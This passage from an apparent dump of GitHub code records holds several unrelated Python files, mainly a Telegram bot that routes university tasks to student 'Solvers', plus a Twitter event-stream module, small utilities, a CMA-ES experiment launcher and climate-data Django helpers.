f'As soon as someone responds to your task, I will let you know right away. ' \\\n f'Based on the reviews in the channel you will be able to pick the best Solver for yourself. 
\\n' \\\n f'Once you have come to an agreement with one of the Solvers, press the \"Choose Solver\" button ' \\\n f'so that no more messages about your task are sent'\n await call.message.edit_text(mess, reply_markup=None)\n for i in send_list_id:\n if i not in DB.ban_users_list:\n try:\n key = await Markup.deciders_answer(id_dunno=task_data['task_message'].from_user.id,\n message_id=task_data['task_message'].message_id)\n await bot.send_message(chat_id=i, text=f'Task on #{task_data[\"sub\"]}')\n await task_data['task_message'].send_copy(chat_id=i, reply_markup=key)\n await asyncio.sleep(0.1)\n except:\n pass\n if user_id in DB.to_do:\n DB.to_do[user_id].append(task_data['task_message'].message_id)\n else:\n DB.to_do[user_id] = [task_data['task_message'].message_id]\n\n await state.finish()\n elif data_call == 'no':\n await call.message.edit_text('Send the task in a single message', reply_markup=None)\n return\n elif data_call == 'stop':\n await call.message.edit_text('You cancelled sending the task', reply_markup=None)\n await state.finish()\n\n\n@dp.callback_query_handler(text_contains='dunno_answer_data')\nasync def dunno_answer(call: types.CallbackQuery):\n data_call = call.data.split(':')\n task_message = int(data_call[3])\n id_dunno = int(data_call[2])\n action = data_call[1]\n if action == 'yes':\n await call.message.edit_reply_markup(reply_markup=None)\n await call.message.answer('You will not be bothered about this task any more')\n DB.activity_users_dict['close'] += 1\n if task_message in DB.to_do[id_dunno]:\n DB.to_do[id_dunno].remove(task_message)\n pass\n\n\nclass deciders_answer_states(StatesGroup):\n send_comment = State()\n\n\n@dp.callback_query_handler(text_contains='deciders_answer_data')\nasync def deciders_answer(call: types.CallbackQuery, state: FSMContext):\n data_call = call.data.split(':')\n task_message = int(data_call[3])\n id_dunno = int(data_call[2])\n action = data_call[1]\n await state.update_data(task_message=task_message)\n await state.update_data(id_dunno=id_dunno)\n if action == 'yes':\n if bool(DB.to_do.get(id_dunno)):\n if task_message in DB.to_do.get(id_dunno):\n await call.message.edit_reply_markup(None)\n keyb = types.ReplyKeyboardMarkup(resize_keyboard=True)\n buttons = ['Skip']\n keyb.add(*buttons)\n await call.message.answer('Write a comment for your response.\\n'\n 'If you do not want to leave a comment, type \"Skip\"',\n reply_markup=keyb)\n await deciders_answer_states.send_comment.set()\n else:\n await call.message.edit_text('Unfortunately a Solver has already been found for this task', reply_markup=None)\n else:\n await call.message.edit_text('Unfortunately a Solver has already been found for this task', reply_markup=None)\n\n elif action == 'prob':\n res = await call.message.edit_reply_markup(reply_markup=None)\n key = await Markup.ban_user(id_dunno)\n await bot.send_message(config.SUPPORT_ID, f'#Report on `{id_dunno}`', parse_mode='markdown', reply_markup=key)\n await bot.forward_message(chat_id=config.SUPPORT_ID,\n from_chat_id=call.from_user.id,\n message_id=res.message_id)\n await call.message.edit_text('The report has been sent to the admins.')\n\n\n@dp.message_handler(state=deciders_answer_states.send_comment, content_types=['text'])\nasync def send_comment_decider(message: types.Message, state: FSMContext):\n keyb = types.ReplyKeyboardRemove()\n if message.text.lower() == 'skip':\n await message.answer('Your profile has been sent to the user', reply_markup=keyb)\n mess = f'@{message.from_user.username} responded'\n else:\n await message.answer('Your comment and 
профиль отправлены пользователю', reply_markup=keyb)\n mess = f'@{message.from_user.username} откликнулся: \\n' \\\n f'{message.text}'\n user_data = await state.get_data()\n\n task_message = user_data.get('task_message')\n id_dunno = user_data.get('id_dunno')\n profile_id = DB.get_profile_id(message.from_user.id)\n await bot.forward_message(chat_id=id_dunno,\n from_chat_id=config.profile_id,\n message_id=int(profile_id))\n key = await Markup.dunno_answer(id_dunno=id_dunno, message_id=task_message)\n await bot.send_message(id_dunno,\n mess,\n reply_markup=key,\n reply_to_message_id=task_message)\n await state.finish()\n\n\n@dp.callback_query_handler(text_contains='dunno_clear_data')\nasync def dunno_clear_data(call: types.CallbackQuery):\n data_call = call.data.split(':')\n task_message = int(data_call[3])\n id_dunno = int(data_call[2])\n action = data_call[1]\n if task_message in DB.to_do.get(id_dunno, []):\n DB.to_do[id_dunno].remove(task_message)\n if action == 'yes':\n DB.activity_users_dict['close'] += 1\n elif action == 'think':\n DB.activity_users_dict['cancel'] += 1\n elif action == 'no':\n DB.activity_users_dict['no close'] += 1\n await call.message.edit_text('Спасибо за ответ', reply_markup=None)\n\n\n@dp.callback_query_handler(text_contains='ban_user_data')\nasync def make_ban_handler(call: types.CallbackQuery):\n data_call = call.data.split(':')\n id_dunno = int(data_call[2])\n action = data_call[1]\n key_ban = await Markup.ban_user(id_dunno)\n if action == 'ban':\n if id_dunno not in DB.ban_users_list:\n DB.ban(id_dunno, yes=True)\n key = await Markup.no_ban_user(id_dunno)\n await call.message.edit_text(f'Пользователь {id_dunno} забанен', reply_markup=key)\n else:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен ', reply_markup=None)\n elif action == 'noban':\n DB.ban(id_dunno, no=True)\n await call.message.edit_text(f'Пользователь {id_dunno} разбанен', reply_markup=key_ban)\n elif action == 'ban_30':\n if id_dunno not in DB.ban_users_list:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен на 30 минут', reply_markup=None)\n await bot.send_message(id_dunno, 'Вы забанены на 30 минут')\n await ban_time(1800, id_dunno)\n await call.message.edit_text(f'Пользователь {id_dunno} разбанен', reply_markup=key_ban)\n else:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен ', reply_markup=None)\n elif action == 'ban_1':\n if id_dunno not in DB.ban_users_list:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен на 1 час', reply_markup=None)\n await bot.send_message(id_dunno, 'Вы забанены на 1 час ')\n await ban_time(3600, id_dunno)\n await call.message.edit_text(f'Пользователь {id_dunno} разбанен', reply_markup=key_ban)\n else:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен ', reply_markup=None)\n elif action == 'ban_1_day':\n if id_dunno not in DB.ban_users_list:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен на 1 день', reply_markup=None)\n await bot.send_message(id_dunno, 'Вы забанены на 1 день ')\n await ban_time(86400, id_dunno)\n await call.message.edit_text(f'Пользователь {id_dunno} разбанен', reply_markup=key_ban)\n else:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен ', reply_markup=None)\n elif action == 'ban_1_week':\n if id_dunno not in DB.ban_users_list:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен на неделю', reply_markup=None)\n await bot.send_message(id_dunno, 'Вы забанены на неделю ')\n await ban_time(604800, id_dunno)\n await 
call.message.edit_text(f'Пользователь {id_dunno} разбанен', reply_markup=key_ban)\n else:\n await call.message.edit_text(f'Пользователь {id_dunno} забанен ', reply_markup=None)\n\n# ------------------- regist -------------------\nclass regist_decider(StatesGroup):\n waiting_regist_univer = State()\n waiting_regist_username = State()\n waiting_regist_subjects = State()\n waiting_end_regist = State()\n\n\n@dp.message_handler(state=regist_decider.waiting_regist_univer, content_types=types.ContentTypes.TEXT)\nasync def regist_univer(message: types.Message, state: FSMContext):\n if len(message.text) > 15:\n await message.answer('Текст не должен превышать 15 символов')\n return\n for i in ['!', '/', '@', '.', ',', '#', '$', '%', '*', '№']:\n if i in message.text:\n await message.answer('Текст не должен содержать лишних символов')\n return\n await state.update_data(univer=message.text)\n if message.from_user.username is None:\n key_regist = types.ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)\n buttons = ['Сделал']\n key_regist.add(*buttons)\n await message.answer(\"Кажется, у вас нет имени пользователя в telegram. \"\n \"Зайдите в настройки профиля и внесите имя пользователя, \"\n \"после этого можно продолжить регистрацию.\"\n \"\\n\\nИмя пользователя нужно для возможности связи с вами, \"\n \"если к вам обратятся за помощью по предмету.\",\n reply_markup=key_regist)\n else:\n key_regist = types.ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)\n buttons = ['ДА', 'НЕТ']\n key_regist.add(*buttons)\n await message.answer(f'Ваше имя пользователя @{message.from_user.username}. '\n f'Если вы согласны продолжить с ним, то нажмите кнопку \"ДА\". '\n f'Если желаете изменить, нажмите \"НЕТ\".',\n reply_markup=key_regist)\n await regist_decider.next()\n\n\n@dp.message_handler(state=regist_decider.waiting_regist_username, content_types=types.ContentTypes.TEXT)\nasync def regist_username(message: types.Message, state: FSMContext):\n key_regist = types.ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)\n buttons = ['Сделал']\n key_regist.add(*buttons)\n if message.text.lower() == 'нет':\n await message.answer(\"Чтобы изменить имя пользователя в telegram, \"\n \"зайдите в настройки профиля и смените имя пользователя, \"\n \"после этого можно продолжить регистрацию.\"\n \"\\n\\nИмя пользователя нужно для возможности связи с вами, \"\n \"если к вам обратятся за помощью по предмету.\",\n reply_markup=key_regist)\n return\n if message.from_user.username is None:\n\n await message.answer(f\"Сделайте имя пользователя. После этого напишите 'сделал'.\"\n f\"\\nОно будет использоваться для возможности связи с вами, \"\n f\"если к вам обратятся за помощью по предмету.\",\n reply_markup=key_regist)\n else:\n keyboard_with_all_subjects = await Markup.keyboard_with_all_subjects_with_see(config.all_subjects[1:])\n keyb = types.ReplyKeyboardRemove()\n await message.answer(f\"Имя пользователя: @{message.from_user.username}\", reply_markup=keyb)\n await state.update_data(username='@' + message.from_user.username)\n await regist_decider.next()\n await state.update_data(subjects=[])\n await message.answer('Теперь выберите предметы, которые вам интересны. \\n'\n 'Выбирайте с умом, т.к. 
по выбранным предметам вам будут приходить уведомления. \\n'\n 'Также можете посмотреть расшифровку предметов👇',\n reply_markup=keyboard_with_all_subjects)\n\n\n@dp.callback_query_handler(text_contains='give_all_subjects', state=regist_decider.waiting_regist_subjects)\nasync def give_subjects_info(call: types.CallbackQuery, state: FSMContext):\n data_call = call.data.split(':')[-1]\n if data_call == 'see':\n keyboard_hide = await Markup.keyboard_with_all_subjects_with_hide(config.all_subjects[1:])\n mess = config.info_subs_mess\n await call.message.edit_text(mess, reply_markup=keyboard_hide)\n elif data_call == 'hide':\n keyboard_see = await Markup.keyboard_with_all_subjects_with_see(config.all_subjects[1:])\n mess = 'Теперь выберите предметы, которые вам интересны. \\n' \\\n 'Также можете посмотреть расшифровку предметов👇'\n await call.message.edit_text(mess, reply_markup=keyboard_see)\n elif data_call == 'stop':\n user_data = await state.get_data()\n if len(user_data.get('subjects')) == 0:\n await call.answer('Пожалуйста, выберите предмет')\n else:\n key_regist = types.ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)\n buttons = ['Подтвердить', 'Начать заново', 'Отменить']\n key_regist.add(*buttons)\n await bot.send_message(call.from_user.id,\n f\"- Универ\\n{user_data.get('univer')} \\n\"\n f\"- Предметы\\n{', '.join(set(user_data.get('subjects')))} \\n\"\n f\"- Никнейм\\n{user_data.get('username')} \\n\",\n reply_markup=key_regist)\n await state.update_data(subjects=set(user_data.get('subjects')))\n await regist_decider.next()\n else:\n await call.answer(f'{data_call} добавлен')\n user_data = await state.get_data()\n subs = user_data.get('subjects')\n subs.append(data_call)\n await state.update_data(subjects=subs)\n\n\n# @dp.message_handler(state=regist_decider.waiting_regist_subjects, content_types=types.ContentTypes.TEXT)\n# async def regist_subjects(message: types.Message, state: FSMContext):\n# all_subjects = config.all_subjects[1:]\n# subs = message.text.lower().replace(' ', '').split(',')\n# for i in subs:\n# if i not in all_subjects:\n# await message.answer('Выберите предметы, нажав на кнопки')\n# return\n\n@logger.catch()\n@dp.message_handler(state=regist_decider.waiting_end_regist, content_types=types.ContentTypes.TEXT)\nasync def stop_regist(message: types.Message, state: FSMContext):\n user_id = message.from_user.id\n keyb = types.ReplyKeyboardRemove()\n if message.text.lower() == 'подтвердить':\n # добавляем пользователя в базу\n profile_id = DB.get_profile_id(user_id)\n if bool(profile_id):\n res = profile_id\n were_decider = True\n else:\n res = await bot.send_message(config.profile_id, 'Создание нового профиля')\n res = res.message_id\n were_decider = False\n user_data = await state.get_data()\n dt = datetime.datetime.now(tz=config.tz)\n dict_values = {'decider': True,\n 'pay_date': dt,\n 'username': user_data.get('username'),\n 'end_pay_date': await give_date_subscription(dt, config.prob_pereod),\n 'univer': user_data.get('univer'),\n 'subject_count': len(user_data.get('subjects')),\n 'profile_id': int(res)}\n DB.update_in_user(user_id, dict_values)\n sub = user_data.get('subjects')\n if were_decider:\n DB.delete_user(user_id=user_id, sub=True)\n DB.new_row_subject_db(user_id, *sub)\n text = await give_profile_desider_text(user_id=user_id, chanel=True)\n await bot.edit_message_text(text, chat_id=config.profile_id, message_id=res)\n await bot.send_message(message.chat.id,\n text='Отлично! Ваш профиль сохранен. '\n 'Теперь вы официально Решала! 
'\n 'Когда кому-то понадобится помощь '\n 'по вашим предметам, мы обязательно сообщим об этом.',\n reply_markup=keyb)\n await message.answer('А это ваш профиль в канале решал. '\n 'Когда вы будете откликаться на задания, '\n 'бот отправит ваш профиль заказчику для возможности связи с вами. '\n 'После успешной сделки заказчик может оставить комментарий и реакцию под вашим профилем.')\n await bot.forward_message(chat_id=message.from_user.id,\n from_chat_id=config.profile_id,\n message_id=res)\n await state.finish()\n elif message.text.lower() == 'начать заново':\n await bot.send_message(message.chat.id,\n text='Регистрация началась заново.\\n'\n 'Напишите ваш университет (сокращенно)',\n reply_markup=keyb)\n await regist_decider.waiting_regist_univer.set()\n elif message.text.lower() == 'отменить':\n await message.answer(\"Регистрация отменена\", reply_markup=keyb)\n await state.reset_state(with_data=False)\n await state.finish()\n else:\n await message.answer('Пожалуйста, введите один из предлагаемых вариантов')\n await regist_decider.waiting_regist_univer.set()\n\n\n# ---------------------------------------------------- admins ----------------------------------------------------\n@dp.message_handler(commands=['chat_info']) # main admin\nasync def chat_info(message: types.Message):\n if await main_admin_test(message):\n await bot.send_message(message.chat.id, message.chat.id)\n\n\n@dp.message_handler(commands=['dump']) # main admin\nasync def dump(message: types.Message):\n if await main_admin_test(message):\n await make_dump()\n\n\n@logger.catch()\n@dp.message_handler(commands=['restart_data']) # main admin\nasync def restart_data(message: types.Message):\n if await main_admin_test(message):\n DB.ban_users_list = DB.ban_list\n try:\n DB.close()\n DB.connect()\n await bot.send_message(config.admin_id, 'Перезагрузка завершена')\n except:\n await bot.send_message(config.admin_id, 'Ошибка перезагрузки')\n\n\n@dp.message_handler(commands=['answer_user']) # admins\nasync def answer_user(message: types.Message):\n if await admins_test(message):\n text = message.text.split()\n id_user = text[1]\n await bot.send_message(id_user, 'Сообщение от админов: ' + ' '.join(text[2:]))\n\n\n@logger.catch()\n@dp.message_handler(commands=['ban_user']) # admins\nasync def ban_user_command(message: types.Message):\n if await admins_test(message):\n text = message.text.split()\n id_user = text[1]\n key = await Markup.ban_user(id_user)\n await bot.send_message(config.SUPPORT_ID, f'Пользователь {id_user}', reply_markup=key)\n\n\nclass send_public(StatesGroup):\n choice_users = State()\n send_publication = State()\n confirm_publication = State()\n\n\n@dp.message_handler(commands=['public'])\nasync def public(message: types.Message):\n if await admins_test(message):\n keyb = Markup.keyboard_public()\n await message.answer('Кому отправить?', reply_markup=keyb)\n await send_public.choice_users.set()\n\n\n@dp.callback_query_handler(text_contains='choice_public', state=send_public.choice_users)\nasync def keyboard_choice_public(call: types.CallbackQuery, state: FSMContext):\n data_call = call.data.split(':')[-1]\n await call.message.edit_text(f'Вы выбрали {data_call}', reply_markup=None)\n await state.update_data(choice_users=data_call)\n await bot.send_message(call.from_user.id, 'Отправь публикацию')\n await send_public.send_publication.set()\n\n\n@dp.message_handler(state=send_public.send_publication, content_types=['text', 'photo', 'document'])\nasync def give_task(message: types.Message, state: FSMContext):\n await 
state.update_data(task_message=message)\n await message.reply('Подтвердите отправку', reply_markup=Markup.confirm_public)\n await send_public.confirm_publication.set()\n\n\n@dp.callback_query_handler(text_contains='confirm_public_from_user', state=send_public.confirm_publication)\nasync def keyboard_subjects_task(call: types.CallbackQuery, state: FSMContext):\n data_call = call.data.split(':')[-1]\n task_data = await state.get_data()\n if data_call == 'yes':\n await call.message.edit_text('Отправка', reply_markup=None)\n send_list_id = 0\n if task_data['choice_users'] == 'all':\n send_list_id = DB.all_list()\n elif task_data['choice_users'] == 'desider':\n deciders_list = (DB.cursor.execute('SELECT telegram_id FROM user WHERE decider = True')).fetchall()\n send_list_id = [x[0] for x in deciders_list]\n elif task_data['choice_users'] == 'dunno':\n dunnos_list = (DB.cursor.execute('SELECT telegram_id FROM user WHERE dunno = True AND decider = False')).fetchall()\n send_list_id = [x[0] for x in dunnos_list]\n # from tqdm.contrib.telegram import tqdm\n # for i in tqdm(send_list_id, token=config.token, chat_id=call.from_user.id):\n for i in send_list_id:\n try:\n await task_data['task_message'].send_copy(chat_id=i)\n await asyncio.sleep(0.1)\n except:\n pass\n await bot.send_message(call.from_user.id, 'Сообщения разосланы')\n await state.finish()\n elif data_call == 'no':\n await call.message.edit_text('Отправь публикацию', reply_markup=None)\n await send_public.send_publication.set()\n elif data_call == 'stop':\n await call.message.edit_text('Вы отменили отправку публикации', reply_markup=None)\n await state.finish()\n\n\n@dp.message_handler(commands=['statistics']) # admins\nasync def statistics(message: types.Message):\n if await admins_test(message):\n await send_statistic()\n\n\n@dp.message_handler(commands=['keyboard_stop']) # main admin\nasync def keyboard_stop(message: types.Message):\n if await main_admin_test(message):\n keyb = types.ReplyKeyboardRemove()\n await bot.send_message(message.chat.id, text='Выключение клавиатуры', reply_markup=keyb)\n\n\n@dp.message_handler(commands=['testing']) # main admin\nasync def testing(message: types.Message):\n if await main_admin_test(message):\n # await message.answer(f'[+]')\n # mem = memory_usage(-1, include_children=True, multiprocess=True)\n # mess = f'{mem} \\n\\n' \\\n # f'all = {np.sum(mem)}'\n # await message.answer(mess)\n for i in trange(1000000, token=config.token, chat_id=message.from_user.id):\n print(i)\n\n\n # all_list = DB.all_list()\n # for i in all_list:\n # DB.cursor.execute('DELETE FROM user WHERE telegram_id = ?', (i, ))\n # DB.cursor.execute('DELETE FROM subject WHERE telegram_id = ?', (i, ))\n # DB.conn.commit()\n # await bot.send_message(config.admin_id, 'База очищена')\n\n # await clear_to_do()\n # while True:\n # await asyncio.sleep(5)\n # await message.answer(f'{message.from_user.username} прошло не меньше 5 секунд')\n\n\n@logger.catch()\n@dp.message_handler(commands=['delete_user']) # admins\nasync def delete_user_command(message: types.Message):\n if await admins_test(message):\n text = message.text.split()\n id_user = int(text[1])\n profile_id = DB.get_profile_id(id_user)\n await bot.edit_message_text('Профиль удален', chat_id=config.profile_id, message_id=profile_id)\n DB.delete_user(user_id=id_user, user=True)\n if DB.decider_exists(message.from_user.id):\n DB.delete_user(user_id=id_user, sub=True)\n await bot.send_message(config.SUPPORT_ID, f'Пользователь {id_user} удален')\n\n\n# 
---------------------------------------------------- RUN ----------------------------------------------------\n\nif __name__ == '__main__':\n executor.start_polling(dp, on_startup=start_bot, on_shutdown=stop_bot, skip_updates=False)\n","repo_name":"daniluck505/help_university_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":47869,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5132853914","text":"# -*- coding: utf-8 -*-\nimport abc\n\nimport peony.utils\n\nfrom .commands import Commands\nfrom .tasks import task\n\n\nclass EventHandler(task):\n def __init__(self, func, event, prefix=None, strict=False):\n super().__init__(func)\n\n self.prefix = prefix\n self.is_event = event\n\n if prefix is not None:\n self.command = Commands(prefix=prefix, strict=strict)\n\n def __call__(self, *args):\n argcount = self.__wrapped__.__code__.co_argcount\n\n if hasattr(self, \"command\"):\n args = (\n *args,\n self.command,\n )\n\n args = args[:argcount]\n return super().__call__(*args)\n\n def __repr__(self):\n return \"<{clsname}: event:{event} prefix:{prefix}>\".format(\n clsname=self.__class__.__name__, prefix=self.prefix, event=self.is_event\n )\n\n @classmethod\n def event_handler(cls, event, prefix=None, **values):\n def decorator(func):\n event_handler = cls(func=func, event=event, prefix=prefix, **values)\n\n return event_handler\n\n return decorator\n\n\nclass EventStream(abc.ABC):\n def __init__(self, client):\n self._client = client\n self.functions = [\n getattr(self, func) for func in dir(self) if self._check(func)\n ]\n\n self.functions.sort(key=lambda i: getattr(i.is_event, \"priority\", 0))\n\n def __getitem__(self, key):\n return self._client[key]\n\n def __getattr__(self, key):\n return getattr(self._client, key)\n\n @abc.abstractmethod\n def stream_request(self):\n pass\n\n async def start(self):\n if callable(self.stream_request):\n stream_request = self.stream_request()\n else:\n stream_request = self.stream_request\n\n while True:\n async with stream_request as resource:\n async for data in resource:\n try:\n await self._run(data)\n except Exception:\n msg = \"error in %s._start:\\n\" % self.__class__.__name__\n peony.utils.log_error(msg)\n\n def _check(self, func):\n if not func.startswith(\"_\"):\n return isinstance(getattr(self, func), EventHandler)\n else:\n return False\n\n def _get(self, data):\n for event_handler in self.functions:\n argcount = len(peony.utils.get_args(event_handler.is_event))\n args = [data, self._client][:argcount]\n if event_handler.is_event(*args):\n return event_handler\n\n async def _run(self, data):\n event_handler = self._get(data)\n\n if event_handler:\n coro = event_handler(self, data)\n try:\n return await peony.utils.execute(coro)\n except Exception:\n fmt = \"error occurred while running {classname}.{handler}:\"\n msg = fmt.format(\n classname=self.__class__.__name__, handler=event_handler.__name__\n )\n\n peony.utils.log_error(msg)\n\n\nclass EventStreams(list):\n def __init__(self):\n super().__init__()\n self.is_setup = False\n\n def check_setup(self, client):\n if not self.is_setup:\n self.setup(client)\n\n def get_tasks(self, client):\n self.check_setup(client)\n return [client.loop.create_task(stream.start()) for stream in self]\n\n def get_task(self, client):\n self.check_setup(client)\n if len(self) == 1:\n return client.loop.create_task(self[0].start())\n elif self:\n raise RuntimeError(\"more than 1 event stream\")\n else:\n raise 
RuntimeError(\"no event stream\")\n\n def setup(self, client):\n for i in range(len(self)):\n self[i] = self[i](client=client)\n\n self.is_setup = True\n","repo_name":"odrling/peony-twitter","sub_path":"peony/commands/event_handlers.py","file_name":"event_handlers.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"19"} +{"seq_id":"9337409996","text":"import os\nimport re\nimport sys\n\n\ndef query_yes_no(question, default=\"yes\"):\n \"\"\"Ask a yes/no question via raw_input() and return their answer.\n\n \"question\" is a string that is presented to the user.\n \"default\" is the presumed answer if the user just hits .\n It must be \"yes\" (the default), \"no\" or None (meaning\n an answer is required of the user).\n\n The \"answer\" return value is one of \"yes\" or \"no\".\n \"\"\"\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")\n\n\n\n# http://stackoverflow.com/a/3167684\ndef splitPath(path):\n folders = []\n\n while 1:\n path, folder = os.path.split(path)\n if folder != '':\n folders.append(folder)\n else:\n if path != '':\n folders.append(path)\n break\n\n folders.reverse()\n return folders\n\n\n\ndef atoi(text):\n return int(text) if text.isdigit() else text\n\n\n\ndef natural_keys(text):\n '''\n alist.sort(key=natural_keys) sorts in human order\n http://nedbatchelder.com/blog/200712/human_sorting.html\n (See Toothy's implementation in the comments)\n '''\n return [ atoi(c) for c in re.split('(\\d+)', text) ]\n","repo_name":"jsza/getoverhere","sub_path":"getoverhere/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11410660338","text":"def is_palindroom(woord):\n uitk = True\n if len(woord) == 1:\n uitk = True\n else:\n for i in range(0, len(woord)//2):\n if woord[i] == woord[len(woord)-1-i] and uitk != False:\n uitk = True\n else:\n uitk = False\n return uitk\n\nprint(is_palindroom('tarwerat'))\n\n","repo_name":"alyssaschaubroeck/Informatica5","sub_path":"10 - Strings/Palindroom.py","file_name":"Palindroom.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40163806555","text":"import argparse\nimport Evaluator\n\nparser = argparse.ArgumentParser(prog=\"CMA-ES\",\n description='This program allows you to run CMA-ES')\n\nparser.add_argument('-m', '--mode', type=str, default='normal',\n help='Program mode. 
Normal will run default CMA-ES implementation, while \\'mean_all\\' and '\n '\\'mean_selected\\' will run algorithm with modification adding a mean point to the '\n 'population, calculated respectively either from whole population all best percentage of it.',\n choices=['normal', 'mean_all', 'mean_selected'])\n\nparser.add_argument('-i', '--iterations', type=int, default=100,\n help='How many times the algorithm should be run.')\n\nparser.add_argument('-fr', '--frequency', type=int, default=1,\n help='How many iteration apart should modification of the algorithm take place.'\n 'Ignored if \\'normal\\' mode is selected')\n\nparser.add_argument('-f', '--functions', nargs='+',\n help='Objective functions to be used for the algorithm. '\n 'Results from all objective functions are averaged.',\n choices=['felli', 'quadratic', 'bent', 'rastrigin', 'rosenbrock'])\n\nparser.add_argument('-d', '--dimensions', type=int, default=10,\n help='Number of dimensions.')\n\nparser.add_argument('-l', '--lbd', type=int, default=100,\n help='Population size.')\n\nparser.add_argument('-t', '--test_case', type=str, default='all',\n help='Which previously prepared test case to run.',\n choices=['selected_frequency', 'all_frequency', 'modifications', 'all', 'custom'])\n\nif __name__ == '__main__':\n args = parser.parse_args()\n if args.test_case == 'selected_frequency':\n Evaluator.selected_frequency_test(args.dimensions, args.iterations, args.lbd)\n elif args.test_case == 'all_frequency':\n Evaluator.all_frequency_test(args.dimensions, args.iterations, args.lbd)\n elif args.test_case == 'modifications':\n Evaluator.modifications_test(args.dimensions, args.iterations, args.lbd)\n elif args.test_case == 'all':\n Evaluator.all_test(args.dimensions, args.iterations, args.lbd)\n elif args.test_case == 'custom':\n Evaluator.custom_test(dimensions=args.dimensions, frequency=args.frequency, objectives=args.functions,\n iterations=args.iterations, mode=args.mode, lambda_arg=args.lbd)\n","repo_name":"michalurb8/AMHE-CMA-ES","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14586320920","text":"from util.zipper import Zipper\nimport datetime\nfrom ocgis import env\nfrom django.http import HttpResponse\nfrom urlparse import parse_qs\nimport util.parms as parms\nimport exc\nfrom ocgis.exc import InterpreterNotRecognized\nfrom ocgis.api.interpreter import Interpreter, OcgInterpreter\nfrom ocgis.api.operations import OcgOperations\nfrom ocgis.api.definition import OcgParameter\nfrom ocgis.util.helpers import reduce_query\n\n\ndef _zip_response_(path,filename=None):\n zip_stream = Zipper(path).get_zip_stream()\n if filename is None:\n dt = str(datetime.datetime.utcnow())\n dt = dt.replace('-','')\n dt = dt.replace(' ','_')\n dt = dt.split('.')[0]\n dt = dt.replace(':','')\n filename = '{1}_{0}.zip'.format(dt,env.PREFIX)\n resp = HttpResponse(zip_stream,mimetype='application/zip')\n resp['Content-Disposition'] = 'attachment; filename={0}'.format(filename)\n resp['Content-length'] = str(len(zip_stream))\n return(resp)\n\ndef _get_query_dict_(request):\n query = parse_qs(request.META['QUERY_STRING'])\n return(query)\n\ndef _get_uri_(query,scalar=False):\n try:\n uri = parms.UidParm(query,'uid',scalar=scalar)\n except exc.QueryParmError:\n uri = parms.UriParm(query,'uri',scalar=scalar)\n return(uri)\n\ndef _get_interface_overload_(query):\n mmap = {'s_proj4':None,\n 's_abstraction':None,\n 
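# None here means the query parameter's own name is reused as the key in name_map (see the loop below)\n 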
't_calendar':None,\n 't_units':None}\n \n name_map = {}\n \n for key,value in mmap.iteritems():\n qp = parms.QueryParm(query,key,scalar=True)\n if value is None:\n value = key\n name_map.update({value:qp.value})\n \n return(name_map)\n \ndef _get_interpreter_return_(ops):\n try:\n interp = Interpreter.get_interpreter(ops)\n except InterpreterNotRecognized:\n interp = OcgInterpreter(ops)\n ret = interp.execute()\n return(ret)\n\ndef _get_operations_(request):\n ## parse the query string\n query = parse_qs(request.META['QUERY_STRING'])\n ## reduce to pull together possible multiple arguments for dataset request\n query = reduce_query(query)\n ## construction the operations objects\n ops = OcgOperations.parse_query(query)\n \n return(ops)\n \n# ## get dataset information\n# uri = _get_uri_(query)\n# variable = parms.OcgQueryParm(query,'variable',nullable=False)\n# dataset = []\n# if len(uri.value) < len(variable.value):\n# for u in uri:\n# for v in variable:\n# dataset.append({'uri':u,'variable':v})\n# elif len(variable.value) < len(uri.value):\n# if len(variable.value) > 1:\n# raise(NotImplementedError)\n# else:\n# dataset.append({'uri':uri.value,'variable':variable.value[0]})\n# else:\n# for u,v in zip(uri,variable):\n# dataset.append({'uri':u,'variable':v})\n# \n# ## initialize initial operations object\n# ops = OcgOperations(dataset=dataset)\n# \n# ## iterate objects parsing the query dictionary\n# for value in ops.__dict__.itervalues():\n# if isinstance(value,OcgParameter) and value.name != 'dataset':\n# value.parse_query(query)\n# \n# ## pull interface overload information\n# ops.interface = _get_interface_overload_(query)\n# \n# ## add request specific values\n# ops.request_url = request.build_absolute_uri()\n#\n# return(ops)","repo_name":"doutriaux1/ocgis","sub_path":"src/django/openclimategis/util/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"37567225037","text":"import collections\nimport bisect\nimport sys\ninput = sys.stdin.readline\n\n\ndef inp():\n return(int(input()))\ndef inlt():\n return(list(map(int,input().split())))\ndef insr():\n s = input()\n return(list(s[:len(s) - 1]))\ndef invr():\n return(map(int,input().split()))\n\n\nif __name__ == '__main__':\n n, m = inlt()\n parents = [i for i in range(n)]\n rank = 